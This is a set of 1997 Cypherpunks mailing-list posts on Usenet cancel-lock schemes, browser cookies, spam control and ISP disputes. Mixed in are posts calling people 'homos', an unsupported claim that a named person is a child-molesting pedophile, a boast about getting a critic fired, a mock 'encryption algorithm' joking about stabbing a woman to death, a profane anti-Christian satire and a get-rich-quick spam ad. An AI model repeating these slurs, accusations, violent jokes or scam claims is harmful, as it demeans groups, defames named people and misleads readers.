engines need > >to > >index *every* page, and allow the topical/categorization system as a > >way > >to further limit searchs. > > You can't make the web search engines do that. It's a free country. It's just a matter of convincing the major search engines to use this system over some others, and to change their opinions on indexing non-rated sites. The only problem with rogue indexers is that the drive space for the index is just enormous (think about how many pages there are on the net, just on the web, ignoring Usenet entirely... I think most of the serach engines store at least the first 100 bytes or so of each page, plus all the indexing... it's rather big..) ----------------------------------------------------------------------- Ryan Anderson - "Who knows, even the horse might sing" Wayne State University - CULMA "May you live in interesting times.." randerso at ece.eng.wayne.edu Ohio = VYI of the USA PGP Fingerprint - 7E 8E C6 54 96 AC D9 57 E4 F8 AE 9C 10 7E 78 C9 ----------------------------------------------------------------------- From dlv at bwalk.dm.com Fri Aug 8 06:01:39 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 8 Aug 1997 21:01:39 +0800 Subject: REPOST : Un-forgeable Cancels In-Reply-To: <12867.9708080920@misun2.mi.leeds.ac.uk> Message-ID: <5R04ae64w165w@bwalk.dm.com> jbaber at mi.leeds.ac.uk writes: > Any comments/glareing weaknesses that I have missed? Well, you missed credited guys named Franz and Huusinen with proposing this exact scheme a couple of years ago. You also missed my discussion on how to allow the local admin to issue cancels as well. I used to think this scheme is very cool. Later I realized it had a serious problem with forgeries in one's name. Suppose X forges an article in Y's name, and specifies a cancel lock; then Y can't cancel this forgery. The retraction server which David is reported to be working on doesn't rely on passwords on authenticate Y; if Y can demonstrate the ability to receive a cookie sent to Y, then the server can issue a signed 'hide' NoCeM for an article that purports to be from Y. Works for forgeries too. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dformosa at st.nepean.uws.edu.au Fri Aug 8 06:03:09 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Fri, 8 Aug 1997 21:03:09 +0800 Subject: JYA Up In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 6 Aug 1997, Dr.Dimitri Vulis KOTM wrote: > ? the Platypus {aka David Formosa} writes: [...] > > You don't get connectivity off of AGIS becuase no-one connnects. AGIS' > > routers ect are so misconfigered ect that pagets seem to move threw it > > more by coninicdence then anything else. > > David, it's remarks like these that cause people to conclude that you're > not very bright. I'm not a customer of AGIS or any of its downstreams, > and I get excellent connectivity to their sites. When agis allowed peaple to measure there performence it was always on the poor side, now that AGIS is blocking all attempts to mesure packet loss over its network (hiding under the excuse that these are attacks) no one can realy tell. > I remind the readers > that certain groups on Usenet hate AGIS because of their refusal to > censor content. It would have more to do with hosting Spamford Wallis the internets second worst abuser. > E.g. read the Net.Scum page for Debbie Taylor to read > how the homos tried to censor the Web site called "www.gothatesfags.com" I have no problems with that web site's existence. > For this reason, homos (is David one?) I'm not gay but my boyfreand is :D.[1] > spread lies ike the above about AGIS, using meaningless technical jargon > and implying that that it doesn't work properly, It dosn't, see the articals about it going down (still haven't found that 'hacker'), see the articals about how it advertised routs that it didn't own, see ... [1] Demitri A little bit of resurch would of established what my sexualiaty is. For the record most of my parteners have been femail - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+rX66QK0ynCmdStAQFw0wQAyX56VZP2xBxw/RxGz/z35BbNrjt0J/YW pBMKtYR5YZVEWhEdjD4vxQSDN7xtwTxvZZJbxBeDweW9rqdohEL6aPIhK60/piAG 50w0uABSIRxT3YcPgSmgSEvLqGWATtyUgu6jQFQ+jpfzsYkQk3uwn8IiUWpg5jvq mbaRS8/ZEYk= =omax -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Fri Aug 8 06:09:34 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 8 Aug 1997 21:09:34 +0800 Subject: Death of the North American Crypto archive? In-Reply-To: <3.0.3.32.19970807212752.00931870@teal.csn.net> Message-ID: Michael Paul Johnson writes: > Alas, it wasn't government regulation. > It wasn't patent entanglements. > It wasn't spooks. > It is economics. Can anyone suggest an alternate host that might provide room > for a few hundred megabytes of ftp access for free (or nearly free)? Can > someone else in North American mirror all of that data, quickly, before the > site shuts down? If it's under 650MB, I can fit it all on 1 CD... --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tm at dev.null Fri Aug 8 06:15:54 1997 From: tm at dev.null (TruthMailer) Date: Fri, 8 Aug 1997 21:15:54 +0800 Subject: The BIG Lie (Jesus Confesses) Message-ID: <199708081253.GAA06495@wombat.sk.sympatico.ca> [From the "I Have Too Much 'Time, Inc.' On My Hands, So This Must Be _Official_ News" Web site.] I couldn't help but notice that the supposed pillars of the religious community, as well as their oh-so-decent-and-righteous followers, tell such widespread, whoppingly big lies about the motivations behind their public actions, as well as about their future intentions, that the true source of corruption in the religious community must undoubtedly come from "higher up" in the chain of commandments. For example, those who are concerned about their children accessing obscene and satanic material on the InterNet might be expected to supervise their children, as well as acquiring the InterNet tools that are available for limiting their children's access to things which the parents find objectionable. You would also expect them to seek out information on sites that met standards that they found acceptable for their children to access. In short, if their interests truly lay in censoring the information their children access, you think they would do exactly that--control and censor their children's activities on, and access to, the InterNet. I couldn't help but notice that, instead, they want to control the activities and access of everyone who uses the InterNet. I find it hard to believe that these people can claim to have the intellect to form valid beliefs about religious and moral issues, yet not be intelligent enough to understand the options available to them. This leads me to suspect that they are, in reality, two-faced liars, particularly since impartial observers can predict the oppressive and censorous results which are usually the exact opposite of what they claim to be their intentions. Patient: "Doctor, it hurts when I do _this_." Doctor: "Then don't _do_ that." If those calling for control and censorship are truly worried about their children, you would expect then to teach their children not to "do that," and to not make available to them things which will allow them to "do that" if they have raised their children to be disobedient and/or irresponsible. Instead, they seem to be taking the moral "high ground," as if under the impression that they are moral "doctors" charged with diagnosing others as having diseased morals, even if the others don't hurt when they "do that." Problem: Little Johnny wants to visit Paul Bradley's "Jesus Loves the Little Children From Behind" web site. Solution: Don't let him do that. Problem: Little Johnny might visit the Duncan Frissel "Pictures of Jesus" site and find pictures of Jesus buggering the little children. Solution: Don't let Little Johnny access sites that you don't know to be acceptable according to your standards. Now, was the foregoing too hard for those reading this to understand? If not, then what could be the reason for those promoting contol and censoring of other people for suggesting the following option... Problem: Little Johnny might access something on the InterNet which does not meet standards that his parent's find acceptable. Solution: Require everyone on the InterNet to only engage in activities which meet the standards of Little Johnny's parents, starting by putting the onus on everyone on the InterNet to "voluntarily" rate their website according to the standards of Little Johnny's parents. Question:"When was the last time a doctor you didn't know made a 'house call' to check on your health, forced his way in when you objected, and gave you a prostrate exam against your wishes?" Answer:"When the government declared that prostrate cancer was a threat to 'national security' and that early detection would 'protect the children' from child molesters and drug dealers." Since spirituality is not inherently related to fascism, it seemed to me that the moral fascism being promoted by members of the Christian community must be the result, not of spiritual values, but rather, the result of the leader of the Christian religion being a moral fascist. It was also obvious that, given the vast amount of lies being told by Christians about their beliefs, motivations, and intentions, that Christianity must be founded on lies and disinformation. Since I do not like to speak ill of someone without taking pains to understand them from the standpoint of their own knowledge and beliefs, I decided that I should have a talk with Jesus Christ, the founder and espoused leader of the Christian religion, and give him a chance to respond to my view of himself and those who follow his example. Mr. Christ was kind enough to let me take notes during our long conversation, so I am providing a transcript of the highlites of the issues we discussed: ----------------------- TruthMonger: "Mr. Christ..." Jesus Christ: "Please, call me Jesus." TruthMonger: "OK. Jesus, what the fuck is going on with all these people claiming that they have the right to force everyone on the face of the earth to live only within the boundaries of moral judgements approved of by you?" Jesus Christ: "Well, TruthMonger, you have to understand that I am the _only_ Way, the _only_ Truth, and the _only_ Light. Accordingly, it is reasonable for my followers come to the conclusion that whatever I approve of is good and that everything else is bad." TruthMonger: "As in, 'Everything Not Permitted, Is Forbidden!'?" Jesus Christ: "Exactly. By the way, is that from '1984' or from 'Animal Farm'?" TruthMonger: "Don't try to change the subject. Jesus! Oh, I mean that as a swear word, by the way...but this is exactly what I object to in your followers--the fuckers never give a straight, truthful answer to the 'hard' questions. They always fall back on some inane quote of yours that has little to do with the issue being discussed." Jesus Christ: "Well, you can't hold me accountable for their actions..." TruthMonger: "Like _fuck_ I _can't_, shit for brains. You're in America, buddy, and we have conspiracy laws here. If the members of your cult go down, then you go down with them, and vice-versa. "You ever hear of Waco? David Koresh? Maharishi? John F. Kennedy?" Jesus Christ: "You're trying to twist things around here, by comparing me and my followers to small cults and Democrats. After all, America is largely a Christian nation with Republican family values." TruthMonger: "Bullshit! It's a democracy, with a legal seperation of Church and State. "America is a Christian nation" is just one more example of the lies your followers try to propogate every chance they get. It's clearly not true, but they refuse to face reality." Jesus Christ: "I said, 'largely'." TruthMonger: "Exactly. You use a word that infers that a 'majority' of Americans are Christian, in order to suggest that Christianity and Democracy are kissing cousins. This is the same goddamn thing that your followers do by constantly taking a smug, self-righteous stance that concepts like freedom, democracy, right and wrong, are all dependent on or connected to the Christian 'majority's' beliefs and morals. "You could just as well say, 'America is largely a "white" nation' but that pig doesn't fly anymore." Jesus Christ: "Now _you're_ trying to twist _my_ words." TruthMonger: "Christ! Oh, that's meant to be a swear word, too...BTW. "What I mean is that your words are being twisted a lot more by your Christian bum-buddies than I could ever hope to manage. "Which wouldn't concern me in the least if they weren't trying to force a potpourri of alleged 'superior' moral beliefs on the rest of us. This is the crux of the matter. As far as I am concerned. Christian fascism is the enemy of democracy and freedom." Jesus Christ: "Well, that's one way of looking at it. However, you might also say, 'It's not perfect, but it's the best system we've got.'" TruthMonger: "Please don't insult my intelligence. You could say the same thing about a bowl of 'shry back to take over until you're sure that your fascist lackeys have all the freedom lovers in chains." Jesus Christ: "Is that supposed to be some kind of threat?" TruthMonger: "Hey, pal. All I'm saying is that what is good for the gander is good for the goose. "As long as this country remains a democracy, then you'd better think twice about claiming to 'love all the little children' and you'd damn sure better make certain you have all the right permits before you go around turning water into wine." Jesus Christ: "I resent the implication that I love the children in anything but a purely 'spiritual' way." TruthMonger: "Well, pal, the circumstantial evidence is against you on this one. Wasn't your father involved in some kind of scandal where he made a man and woman naked and then told them to fuck and party down?" "If I remember right, he had some kind of fetish about telling the Jews to fuck a lot and was always talking about their 'cum'." Jesus Christ: "He used _decent_ words, like 'be fruitful and multiply', and 'seed', not 'cum'." "And you should have capitalized the word 'Father' when you made mention of him, BTW" TruthMonger: "Fuck you pal, I'm sending this to the CypherPunks mailing list. Are you the new list moderator? "Good fucking luck..." Jesus Christ: "I don't have to take this kind of abuse. I'm putting you on the 'flames' list." TruthMonger: "Big deal. I'm already in Tim C. May's 'killfile'." Jesus Christ: "If intolerance is such a Christian trait as you claim, then why is my 'flames' list smaller than Tim May's 'killfile'?" TruthMonger: "Now you're twisting _my_ words. Are you related to Kent Crispin? Say... Come to think of it, why has no one ever seen the two of you together?" Jesus Christ: "Let's just say that Kent and I agree on many issues that have to do with the sanctity of a higher authority. "No one has ever seen the evil Dr. Vulis and Satan together,l of eternity', then you'd better get to work on a way to stop the CypherPunks 'Eternity Server' from routing around fascist Christian moralism." Jesus Christ: "Adam Back... Isn't he a member of that weirdo "Circle of Eunuchs" cult?" TruthMonger: "That's for me to know, and for you to find out, pal. "Unless you can break PGP, of course." Jesus Christ: "Hey, I'm just Jesus. I'm not Phil Zimmerman, for _My_ sake." TruthMonger: "Hey, watch your language." Jesus Christ: "Sorry, I meant to say 'for _Dimitri's_ sake'." TruthMonger: "I'll tell him you capitalized his name. He'll get a kick out of that. "Any last words before I turn in for the night?" Jesus Christ: "Christianity recognizes privacy and freedom as damage, and steamrollers over them." TruthMonger: "No shit!" ----------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ All references to Tim C. May's Vernacular Translation of the Bible are used without permission. What's he going to do, sue me? Then he'd have to admits he gets vicarious pleasure out of reading the posts in his killfile. {There's more than _one_ way to push a key.} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From nobody at REPLAY.COM Fri Aug 8 06:31:27 1997 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Aug 1997 21:31:27 +0800 Subject: Source Code for New Encryption Algorithm Message-ID: <199708081258.OAA15145@basement.replay.com> Source Code for the Dick TruthMeasure Encryption Algorithm: (c) "The Hoff-Center of Virtual Math" ==============> || + DOOM = DICK + DEATH = 2" + NULL = Nine Inch Nails ## Proof of Theorem: ## ## If she says "I want nine inches, and I want to bleed." and you give ## her two inches, four times and stab her to death, using a 6" knife, ## then 4(DICK) + 6" = 8" + 6" = Nine Inch Nails. ## ## Therefore, Nine Inch Nails band members have 14" Dicks. ## ## Basing the Private Key on Nine Inch Nails private parts, and the ## Secret Key on the secret location where the dead woman's body is ## buried, the sick, twisted creators of the "Dick TruthMeasure ## Encryption Algorithm" have produced a cryptography product which ## cannot be broken by normal people, using normal math. ## This has been confirmed by the independent research of Carol Anne ## Cypherpunk, who reports that Kent Crispin has always claimed that ## this, ================>, is eight inches, while Tim C. May claims ## this, ================>, is fourteen inches. ## Her research methods have been approved by TruthMonger, who ## states, "Give her two inches, and she takes a mile. She never ## judges an encryption algorithm until she's fucked a mile with ## your Dick in a 'rubber boot'." ## In response, Carol Anne Cypherpunk said of TruthMongers sexual ## prowess, "He claims that his Dick was the inspiration for the ## Eternity Server, but it is a forgery, like his posts to the list. ## It just _seems_ like it never ends when you are subjected to ## abuse of either of them. A mile, my ass..." (I mean, ) From dlv at bwalk.dm.com Fri Aug 8 06:37:29 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 8 Aug 1997 21:37:29 +0800 Subject: forged cancels (Re: Entrust Technologies's Solo - free In-Reply-To: <199708081138.NAA07099@basement.replay.com> Message-ID: nobody at REPLAY.COM (Anonymous) writes: > "I'm sorry but I just don't consider 'because he's a pedophile' to be a > convincing argument." We hate Chris Lewis because he forges cancels (and not only for "spam"), but just because he's an icky child-molesting pedophile. Death to censors! --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Aug 8 06:38:07 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 8 Aug 1997 21:38:07 +0800 Subject: Platypus and the kangaroos Message-ID: ? the Platypus {aka David Formosa} writes: > > E.g. read the Net.Scum page for Debbie Taylor to read > > how the homos tried to censor the Web site called "www.godhatesfags.com" > > I have no problems with that web site's existence. I haven't looked at the site (I conclude from the name that it's probably not something I care to see), but I will fight for its free speech. Apparently a number of people listed at the Net.Scum site do want to shut down this site because they don't like its name and/or contents. Agis's troubes with the (largely homosexual) Net.Cabal started before they signed up Stanford Wallace. > [1] Demitri A little bit of resurch would of established what my > sexualiaty is. For the record most of my parteners have been femail[2] David, with all due respect, I got more interesting things to research than your sexuality! :-) [2] Have any of the "others" been kangaroos? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jbaber at mi.leeds.ac.uk Fri Aug 8 06:41:41 1997 From: jbaber at mi.leeds.ac.uk (jbaber at mi.leeds.ac.uk) Date: Fri, 8 Aug 1997 21:41:41 +0800 Subject: REPOST : Un-forgeable Cancels Message-ID: <12952.9708081327@misun2.mi.leeds.ac.uk> Glad that the mail got through that time - not forged cancels though I am sure, more likely a cock up with my mail sppol..... > Adam Back writes: > Sounds good to me. I thought there was someone doing something like > this with hashes. But then I never really looked into any of the > systems. What does Greg Rose's PGPMoose do? (One presumes it > involves PGP sigs?) I must admit that not being a news admin and rarely posting to news I have not realy looked at what is being worked on. I was just reading the 'forged cancels' thread when I though of the hash idea. >From what I can see (the full README is unavailable) PGPMoose is designed to Cancel messages in a moderated newsgroup that have not been approved by the moderator - by using PGP sigs to authenticate the approval. see http://people.qualcomm.com/ggr/pgpmoose.html This could be modified for general cancels but would then involve PGPMoose having access to every authors Public Key. > > This does assume that message IDs are available by the news program > > and are not allocated after sending. If this is not the case then it > > would be necessary to use other header information to calculate the > > hash such as the date/time and subject, or to store some kind of key > > at the authors end in order to reference the message (although in > > this case X may as well just be generated randomly and stored). > > I think you don't even need this much uniqueness of hashing > material... Personally I would prefer a unique value for every message, especially if I was a prolific sender of news. > Say you just chose a random R and store it in ~/.news-preimage, and > HASH( R ) in ~/.news-image. > > Now you post all of your posts with HASH( R ) in a header as you are > suggesting. > > Now if you didn't want to be coerced in to cancelling your own posts > you just remove .news-preimage instantly. > > You have to update your preimage for each cancel you do, but how many > cancels do people do anyway? (Not many for their own benefit I > reckon). This would work well but would allow an attacker to cancel any message sent using that value of R as soon as the author sent a message. Generally the more messages that you sent the more vulnerable you would be to this (as more of your articles would still be in the news feed) - exactly how much of a problem this would be depends on whether archivers accept cancels (which I doubt) and how long the news group in question is stored in the news spool before timing out. > This is a low security application, and ease of use over user typed > passwords will win I think. This I completely agree with, I was initally thinking of leaving the password as an Environmental variable set when the user logged on (.cshrc, .login, AUTOEXEC.BAT etc as appropriate). It makes very little difference if this is the case or if it was stored in a file, however a good news program could offer the option of using a different random/secret for any particular message if the author wanted it to be [more] secure from their systems manager. > Conceivably you could cope with the above by making .news-image > readable to the news system on your local net news service. This > could transparently do the job without needing to update any clients > -- only an INN patch required. Sounds like a phun project for > someone. This is far simpler than if you calculate a unique hash for each new message and may be the part that wins the day. > Issueing cancels would be more manual, but you could easily knock up a > perl script to instruct the NNTP server to do that. (Or windows > program, or whatever). I think that issueing cancels should be more complex than just clicking on a button - after all once you have said something there is very little reason to try to cover it up - in most cases a simple correction would do. > If you really wanted to integrate cancels without updating clients, > for those that support them you'd have to give the NNTP news server > access to your preimage, R. Not sure this is a good idea, as now your > ISP can be coerced into cancelling your message for you without your > cooperation. This would generally be a bad idea, however you should remember that the NNTP news server could simply be modified to overwrite yor Cancel_Ref: header with their own value of Y anyway or even just not forward your article, just as any news admin could (any news admin can only change those 'down the path' from them). > Course all these problems go away if you do update clients, but it's > usually nice to offer an easy interim migration path, else no-one will > use it. > > Adam Again true, however this is true for any cancel checking mechanism. As far as I can see the advantage to this idea over digital signatures is that the NNTP program that has to decide whether to accept the cancel or not does not need access to the public key of the sender. Another thing is that the modification to the NNTP program is the same whether you use a unique hash per message or a stored ~/.news-preimage as all that it has to do is check that the value included in the cancel message hashes to the value in the original message. This would allow quick updates to both NNTP and the news-reader (probably originally using the stored preimage) and later versions of the news-reader to be updated to include the unique hash (which can still operate transparently to the user, using either a file or environmental variable) without having to make any changes to the NNTP program. Thanks for the comments, Jon http://chem.leeds.ac.uk/ICAMS/people/jon/ From trei at process.com Fri Aug 8 06:50:09 1997 From: trei at process.com (Peter Trei) Date: Fri, 8 Aug 1997 21:50:09 +0800 Subject: Query on cookies Message-ID: <199708081336.GAA04744@toad.com> > Date: Thu, 7 Aug 1997 23:24:28 -0400 (EDT) > From: Declan McCullagh > To: "Dr.Dimitri Vulis KOTM" > Cc: cypherpunks at toad.com > Subject: Re: Query on cookies > Reply-to: Declan McCullagh > I believe this is what the folks at Netscape tried to eliminate in 4.0, > which I'm told features four cookie settings. One rejects "third party > cookies." > > -Declan Well, I'm using version 4.01a for NT. There are three settings for cookies: 1. Accept all cookies. 2. Accept only cookies which get sent back to the originating server. 3. Disable cookies. There's also a checkbox labled: "Warn me for accepting a cookie." I've been fairly unhappy with this version - the cookie management and the "Personal Toolbar" (user specified buttons for frequently visited sites) are the only new features that seem useful. It tends to crash frequently, and the usenet news (aka "Collabra Discussion Groups") seems to be broken (some of the earlier versions had a fairly useful newsreader). It's also a disk hog. Note: This is a beta version. Peter Trei trei at process.com PS: I have it set on 'disable cookies'. DISCLAIMER: The above is my personal opinion only, and not neccesarily representative of my employer. From dformosa at st.nepean.uws.edu.au Fri Aug 8 06:50:17 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Fri, 8 Aug 1997 21:50:17 +0800 Subject: non-censorous spam control (was Re: Spam is Information?) In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 6 Aug 1997, Dr.Dimitri Vulis KOTM wrote: [...] > Why do people try to flood newsgroups with shit? I can see a number of resons 1) For profet (pron4porn ect) 2) To prevent discution that thay do not like (Sientology, the poatry feastivil.) 3) To the amusument of there small minds (trollers ect) 4) By accedent (ARRM, other spews) 5) Out of shear madness (Dr Rouger Rabbit) [...] > Examples from the Net.Scum rogue collection: Scott Kellog from Sematech > falsely accuses various people of "spamming" his newsgroup, but hasn't > been caught forging cancels yet. But lieing is free speach isn't it? As long as he is not forging cancels I don't see anything wrong with the little troll having some fun. > On the other hand Bob Curtis has taken > over alt.smokers.cigars and forges cancels for articles that merely > question his "ownership" of the newsgroup. Do read - it's very enlightening. IRC Bob Curtis was sent away with his tail between his legs. > They argue that according to Hardin, Usenet would be > used more "efficiently" if every newsgroup had an "owner" I don't see anywhere that being suggested. Most peaple suggest that Usenet would work better if peaple stopped abuseing it. I don't trust the newsgroup care peaple any further then I can kick them. In fact I have been encourgaing them to stop. [...] > The good news is that newsgroup floods don't really hurt anyone except > the egos of the assholes who claim to "own' the affected newsgroups. And the newsevers and the regular readers. [...] > > Here we aggry, porn4pron and others will still make a proffet from > > spamming. [...] > I like the idea of encouraging news readers to send e-cash (possibly via > anon remailers) to the posters whose writings they like and would like to > see more of. A local bank (to me anyway) offers e-cash. I'll see how I can contrabue to makeing the usenet a better place. [...] > And my response is: > why not just killfile the idiots, or why not choose to not select > their crap for reading - it's easily identifiable. Its not realy. All you get is a war where your spamer becomes more sofistercated in there spaming to avoid the filters. > Do you remember all the talk about "intelligent internet agents" who were > supposed to look for stuff we're interested in I belave this is the idear behind Mr Hayes' newsreader. [...] > > I have attempted to do so in the past, and will attempt to do so again. > > There's some interesting discussion going on there in addition to my xposts. I have again requested entery. No responce yet. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+rm76QK0ynCmdStAQHhngP9HdAnn4jhRvkfxjQ/+b7w3FjqTSR9L2Wh nKSQoOUSzX95F/RLb6zwVC6+HKGh0Z41cJutKl7m2yw7D5shCBC1lmuWXaes+1el fGE8mCIzV9pbU20tLDL8xXhQSAfCBVJ/cJQZVjz+C2/DCARKnlPL7v/fkG56hplo XjQWZ8yDiNQ= =nqqo -----END PGP SIGNATURE----- From dformosa at st.nepean.uws.edu.au Fri Aug 8 07:08:31 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Fri, 8 Aug 1997 22:08:31 +0800 Subject: forged cancels (Re: Entrust Technologies's Solo - free download) In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 7 Aug 1997, Dr.Dimitri Vulis KOTM wrote: > ? the Platypus {aka David Formosa} writes: > > > Dose threats from a multynatnatil corpration count? Dose living in > > Austrlia count? > > Evidently these haven't made you into a staunch opponent of censorship. Just because I do not copy your more rabid tacktics dose not mean that I am anyless an opponent of censorship. I fight it in my own way, as well all must do. [...] > Tim Skirvin presents these "newbies" with a false view of Usenet as a > unified front of news admins who have all reached consensus that free > speech is evil and are now fighting the evil spammers. There is a strong aggreyment amounst most admins for the policy of spam canceling if there wasn't all hell would have broken out sooner. > > This is interesting, proof please. > > Check out Chris Lewis's Net.Scum page at http://www.netscum.net/lewisc0.html. > Find "Edward Gerk" - one of the people who quoted Chris Lewis and whose > articles Chris Lewis canceled for "copyright violations". I check it out, there is a slight diffrence you can see from the staments that he had maid that it was in addtion to him being in excess of BI. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+rpmqQK0ynCmdStAQFv2QQAq+b+fGg3AeS28LtL8CzZhSCSzk6Izf/O mXZQRLMTioeVYHk57XpqxQ32iYGmxQkADeZOTIyDm8YumCjA7q7b29cBsPcKPBJL 2mhZ8GqQOXPl0vJPBVyPhDdA6NlKhyH8TwKy1gE9Ky7ZnJHzSFqhND+Z+lan3QOt F/Vnv5l0qwE= =vY6O -----END PGP SIGNATURE----- From paulmerrill at acm.org Fri Aug 8 07:15:55 1997 From: paulmerrill at acm.org (Paul H. Merrill) Date: Fri, 8 Aug 1997 22:15:55 +0800 Subject: Query on cookies In-Reply-To: Message-ID: <33EB4EB4.7ADC@acm.org> Dr.Dimitri Vulis KOTM wrote: > > Declan McCullagh writes: > > > I believe this is what the folks at Netscape tried to eliminate in 4.0, > > which I'm told features four cookie settings. One rejects "third party > > cookies." > > Blessed are those who believe. > And for those who don't believe there is always Read Only for Cookies.txt. PHM From dformosa at st.nepean.uws.edu.au Fri Aug 8 07:29:41 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Fri, 8 Aug 1997 22:29:41 +0800 Subject: forged cancels (Re: Entrust Technologies's Solo - free download) In-Reply-To: <39q2ae27w165w@bwalk.dm.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 6 Aug 1997, Dr.Dimitri Vulis KOTM wrote: > ? the Platypus {aka David Formosa} writes: > > > I don't think Mr Lewis' algeded activerties with childeren have any > > validity to the argument. Calling him a 'Pedophile' or any other name is > > not effective in changing my option about this mattor. > > "Chris Lewis" is a common name. But every body in this context know who you are talking about. How many other Chris Lewises are involved in spam canceling. Even if that was unstafactory you could of appened his name with his email address wich is uniqe. > "Pedophile Chris Lewis" serves to identify It also helps discreadit you. I know that you are a resonable and sane person. And many of your arguments are valid but others don't know you thay well and makeing comments like the above can harm your postion. > > As yet I have seen only the one, could you provide these other examples > > where Chris Lewis has perposly canceled posts that he dosn't like. [...] > I said, there were dozens of examples of cancel-forgers who claim to be > cancelling "spam" (i.e. multi-posts), Oh sorry I missparsed what you meant. I fully appologise for any harm done. [...] > > It seems to me more in the range of hours or days, esp in the case of > > uucp sites wich don't connect often. > > This was the case many years ago. These days, a spam propagates pretty > much everywhere because the cancels catch up with it. I would wonder how we could test artical propergation times, anyone with some stats. [...] > > There _is_ I'm talking about present tence. Any anty spammer who dosn't > > follow the convention is going to be stopped or losse there account (eg > > David Richards). > > David Richards is the sysop of the Ripco BBS in Chicago. My bots say he is not issueing any cancels. Unless he has discoved a way to hide. He was recently whining about how the nasty cabal stopped him from canceling. [...] > > And yes if thay set the reply-to: feild of the message to me I do consider > > it my post and cancelble from me. > > To hell with cancels, but you should be able to issue a retraction nocem. Yes I should (and I will). Still working on that darn bot. [...] > One of > the complainers wrote from a work account - I tried to get him fired and > apparently succeeded :-) :-) :-) I thourt you where against plug pulling? [...] > > The creadit card securaty system is so fundermently flawed as to be > > the equiverlent of sticking a large sign on your forhead marked "ROB > > ME" > > That's right, except in the U.S. various laws protect the consumer. Since when have laws stopped crimminals? Systems should be set up so that thay can't be abused reather then inposing half assed laws ontop of a basicly broken system. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+rs8qQK0ynCmdStAQFBrQQAyPmwgzUJsraJYuXNTfXHiZTGO1WWJeHv t0niVtfGKe1s7x2vYRQJmUilFsyWu1KvpfaPRSH2XLT45/lN5Q9UozhxXNldqLc7 s+8n3ikkrkDhzRifq0O9OdBXgbZQnCj4DgjSQV7IDnHps7sUjBoo5LcPFNqyJtqd ZOgRCOri9OU= =rzgL -----END PGP SIGNATURE----- From nospam-seesignature at ceddec.com Fri Aug 8 08:21:59 1997 From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com) Date: Fri, 8 Aug 1997 23:21:59 +0800 Subject: this could happen to remailers (was Re: Whining for 'Accountability') In-Reply-To: <199708081140.MAA00231@server.test.net> Message-ID: <97Aug8.111031edt.32257@brickwall.ceddec.com> From nospam-seesignature at ceddec.com Fri Aug 8 08:24:09 1997 From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com) Date: Fri, 8 Aug 1997 23:24:09 +0800 Subject: Third party rating systems are good for society In-Reply-To: Message-ID: <97Aug8.110003edt.32257@brickwall.ceddec.com> From 48267539 at usa.net Fri Aug 8 23:29:43 1997 From: 48267539 at usa.net (48267539 at usa.net) Date: Fri, 8 Aug 1997 23:29:43 -0700 (PDT) Subject: $300 PER DAY IN 5 WEEKS!! Message-ID: <4756089120792879.GP493285@via-netcom3.net> For the ULTIMATE in moneymaking software, go to: http://www.mkt-america.com/user/matt2/ This is a FREE program you can download directly from our web site. THIS WILL MAKE YOU A MILLIONAIRE THIS YEAR!!! ===> Just send people to your FREE webpage we give you and get $$ in the mail. It's been three weeks, and I'm making $300 PER DAY!! From kent at songbird.com Fri Aug 8 09:10:59 1997 From: kent at songbird.com (Kent Crispin) Date: Sat, 9 Aug 1997 00:10:59 +0800 Subject: spam as DOS In-Reply-To: Message-ID: <19970808083427.33732@bywater.songbird.com> On Fri, Aug 08, 1997 at 01:38:25PM +0200, Anonymous wrote: > > > How about if it is an employee of yours, using your computer > > > equipment, that sent the message, in explict contradition to your > > > companies stated policy? > > > > Use a retraction server (David's project) 